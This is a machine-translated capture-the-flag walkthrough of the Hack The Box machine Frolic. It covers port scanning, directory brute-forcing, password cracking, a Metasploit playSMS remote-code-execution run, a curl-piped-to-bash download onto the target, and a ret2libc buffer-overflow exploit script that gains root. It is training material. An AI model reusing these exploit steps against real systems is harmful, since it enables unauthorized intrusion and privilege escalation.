Error message here!

Hide Error message here!


Error message here!


Hide Error message here!


Error message here!



Detailed explanation of penetration test for frolic

Ms08067 safety laboratory 2021-02-23 19:22:49 阅读数:2 评论数:0 点赞数:0 收藏数:0

Produce |MS08067 laboratory (

The author of this article : Da Fangzi (Ms08067 Core members of the laboratory )

Hack The Box It's a CTF Challenge the target platform , Online penetration testing platform . It can help you improve your penetration testing skills and black box testing skills , It contains some constantly updated challenges , One of them is simulating real world scenes , There is also a tendency to CTF The challenge of style .

There are a lot of targets on the platform , From easy to difficult , Every time a hacker invades a machine, he will get corresponding points , There is a hall of fame by ranking points . What we're going to test today is the target Frolic.

First of all, we use nmap Scanning target's open ports and services :

nmap -sV -sT -sC

give the result as follows

1. Starting Nmap 7.70 ( ) at 2019-03-31 14:49 CST
2. Nmap scan report for
3. Host is up (0.33s latency).
4. Not shown: 996 closed ports
6. 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
7. | ssh-hostkey:
8. | 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
9. | 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
10.|_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
11.139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
12.445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
13.9999/tcp open http nginx 1.10.3 (Ubuntu)
14.|_http-server-header: nginx/1.10.3 (Ubuntu)
15.|_http-title: Welcome to nginx!
16.Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel
18.Host script results:
19.|_clock-skew: mean: -1h50m00s, deviation: 3h10m30s, median: -1s
20.|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
21.| smb-os-discovery:
22.| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
23.| Computer name: frolic
24.| NetBIOS computer name: FROLIC\x00
25.| Domain name: \x00
26.| FQDN: frolic
27.|_ System time: 2019-03-31T12:20:18+05:30
28.| smb-security-mode:
29.| account_used: guest
30.| authentication_level: user
31.| challenge_response: supported
32.|_ message_signing: disabled (dangerous, but default)
33.| smb2-security-mode:
34.| 2.02:
35.|_ Message signing enabled but not required
36.| smb2-time:
37.| date: 2019-03-31 14:50:18
38.|_ start_date: N/A
40.Service detection performed. Please report any incorrect results at .
41.Nmap done: 1 IP address (1 host up) scanned in 63.62 seconds

You can see 22 On port number SSH,139 and 445 Of SMB, and 9999 On port http.

Let's check SMB Is there any point that can be used , Here we use smbmap Look at the target's file sharing

1. smbmap -H

appear 2 We have a share, but we don't have access to it .

Let's go to the http look down

* Tips : have access to nc -zx IP port Can quickly detect the target address, whether the specified port is open .
Here we are nc -zx 1880 There will be inverse host lookup failed: Unknown host
(UNKNOWN) [] 1880 (?) open
there open explain 1880 The port is open

A welcome page , There's a line down there Thankyou for using nginx. http://forlic.htb:1880

Let's visit

A backstage , We need an account and password , Try some common default account and password, login will appear prompt login failure , But when I use admin:password When , The page will be stuck all the time and will not jump out of any prompt , I don't know why , And here because of the security measures, failure many times will make us wait 10 Try again in a few minutes , So you can't use brute force to get the account password

We use it gobuster The contents of the website

1. gobuster -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o fronlic-gobuster.log -t 40

Gobuster Or part of it , Let's go straight to see what these are

We see backup There are 3 File (password.txt user.txt loop/)

Let's visit

The content appears :password - imnothuman

Let's visit

The content appears :user - admin
So we get a set of account passwords :admin: imnothuman

Go to the one just now Node-RED Try to log in

I can't find out , Let's go to the /admin try

The prompt appears You have left 2 attempt, I use burp There is no information in the bag , I looked at the source code Of JS Found this

One of the author's tricks , We type in... On the page admin: superduperlooperpassword_lol

I went in and found it was a mess

It should be a kind of coding , This also copied this pile of things into Google to find this website

Access to the / asdiSIAJJ0QWE9JAS

use vim write in frolic.bas64( There will be spaces in it. Remember to remove them , It can be used vim Command line input for s/ //g Go to )

use base64 decode

There's a mess , Because it's other file data , We export to a file and check the type

1. base64 -d frolic.bas64 > frolic
2. file frolic

Discovery is a ZIP file

use mv Rename it , And use zipinfu Check out the information

1. mv frolic
2. zipinfo

Decompression found that a password is needed

We use it zip2john Convert this compressed file into a password HASH, And then use john Go and crack it

1. zip2john >

1. john --wordlist=/usr/share/wordlists/rockyou.txt
2. john --show

Password found :password
And then decompress it again

Cat The content feels like 16 Base number , Let's switch and try

1. cat index.php | xxd -r -ps

Output these contents to a file and use base64 Transcoding , Note that the output to the file has a newline. You need to remove the newline from the file

1. cat index.php | xxd -r -p > index.php.b64

This one also needs to be decrypted , I also use GOOGLE Find the corresponding cracked website

Website :

Decryption result :idkwhatispass

There's no clue here , In all, we got 2 Set the password , That means there should be pages that we haven't found , The password should belong to the page we didn't find

Here we continue to input the order of blasting on the basis of the first blasting

1. for i in admin dev test backup loop;do gobuster -u$i -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 150 -o Fronlic-gobuster-$i.log;done

This order is to make admin dev test backup loop and Make a combination and call gobuster Scan output , We need to wait for a while

We'll find it in /dev Next one /backup Catalog

Access to the

Then try to log in with the password we just got .

Correct account password :admin:idkwhatispass

Let's find out playsms Are there any known exploitable vulnerabilities

1. searchsploit playsms

We use it directly 1.4 Version of Remote code execution vulnerability

We can searchsploit-x Path Check the corresponding vulnerability description , Use by hand

You can also use msf Integrated in

1. msf5 exploit(multi/http/playsms_uploadcsv_exec) > set password idkwhatispass
2. password => idkwhatispass
3. msf5 exploit(multi/http/playsms_uploadcsv_exec) > set rport 9999
4. rport => 9999
5. msf5 exploit(multi/http/playsms_uploadcsv_exec) > set rhosts
6. rhosts =>
7. msf5 exploit(multi/http/playsms_uploadcsv_exec) > set targeturi /playsms
8. targeturi => /playsms
9. msf5 exploit(multi/http/playsms_uploadcsv_exec) > set lhost
10.lhost =>
11.msf5 exploit(multi/http/playsms_uploadcsv_exec) > run

A session will be returned after success

obtain user flag

The next step is to raise the right to obtain root jurisdiction

Here we use LinEnum It is used to check the utilization points that can be used to claim rights

Use python Of SimpleHTTPServer The module of LineEnum Upload to target for execution

And then in shell In the implementation of

1. curl | bash

And here we see with SUID One of my files is ayush Under the directory of

You can see that we have executable permissions for this file

Will take our input and output

We go through

1. base64 rop

Get the encoded content of this file , Then put it back to the machine and check and debug the decoding of this file

1. base64 -d rop.ba64 > rop
2. chmod +x rop
3. ./rop hello

Then we use it locally gdb debug

1. gdb rop

plug-in unit peda Installation :

We make a 100 Input the length to rop

give the result as follows

Found that the program was terminated and prompted SIGSEGV
Because too much input leads to overflow

Let's record where the error happened on top 0x41474141

The transformation is AGAA

This is the position we just entered

use pattern_offset 0x1474141 Calculate the position , yes 52

And then we use python Output 52 individual A

At the same time, add your own information

Under transformation 0x7a666473

explain 52 Overflow occurs after a character .

Now we need to know /bin/sh The address of , I'm not going to do that by loading strings into environment variables as I used to do . There's a better way , First we need to find /bin/shin The offset libc, We're going to use it strings To get the address :

1. strings -a -t x /lib/i386-linux-gnu/ | grep /bin/sh

Address :0x0015ba0b

And then we need the address libc, We can use ldd It comes to get it :

1. ldd rop

Address :0xb7e19000

Then we'll integrate the two addresses to get /bin/sh The real address of

/bin/sh:0x0015ba0b+ 0xb7e19000=0xb7f74a0b

Now what we need system() and exit() The address of

Here I need to run on target gdb see , But the target doesn't have gdb, We need to go from github And then download it to the target , Target aircraft can use wget Command to download , And then to gdb Add execute permission , Finally, rop debug


1. wget
2. mv gdb-7.10.1-x32 gdb
3. chmod +x gdb
4. ./gdb /home/ayush/.binary/rop

(gdb)p system
(gdb)p exit

It's written in payload

1. #!/usr/bin/python
3. import struct
5. buf = "A" * 52
6. system = struct.pack("I" ,0xb7e53da0)
7. exit = struct.pack("I" ,0xb7e479d0)
8. shell = struct.pack("I" ,0xb7f74a0b)
9. print buf + system + exit + shell

And then put exp Upload it to the target to get root jurisdiction

For reprint, please contact the author and indicate the source !

Ms08067 Security lab focuses on the popularization and training of network security knowledge . Team published 《Web Safe attack and defense : Penetration test practice guide 》,《 Intranet security attack and defense : Penetration test practice guide 》,《Python Safe attack and defense : Penetration test practice guide 》,《Java Code security audit ( Introduction )》 Other books .
Team official account is regularly shared. CTF shooting range 、 Intranet penetration 、APT Technical dry goods , Starting from scratch 、 Based on actual combat , Dedicated to making a practical dry cargo sharing official account. .
Official website :

Scan the QR code below and add it to the lab VIP Community
After joining, invite to join the internal VIP Group , The internal wechat group is permanent !

Copyright statement
In this paper,the author:[Ms08067 safety laboratory],Reprint please bring the original link, thank you